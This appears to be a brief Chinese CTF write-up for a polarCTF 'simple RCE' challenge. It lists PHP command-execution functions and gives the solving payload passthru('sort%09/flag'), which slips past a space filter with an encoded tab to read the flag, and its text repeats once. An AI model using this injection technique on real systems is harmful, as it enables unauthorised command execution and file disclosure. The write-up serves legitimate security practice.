polarCTF 简单rce
直接对代码进行分析:
命令执行函数
system()
passthru()
exec()
shell_exec()
popen()/proc_open()
passthru没有被过滤,所以直接sys=passthru('sort%09/flag');得到flag
直接对代码进行分析:
命令执行函数
system()
passthru()
exec()
shell_exec()
popen()/proc_open()
passthru没有被过滤,所以直接sys=passthru('sort%09/flag');得到flag
浙公网安备 33010602011771号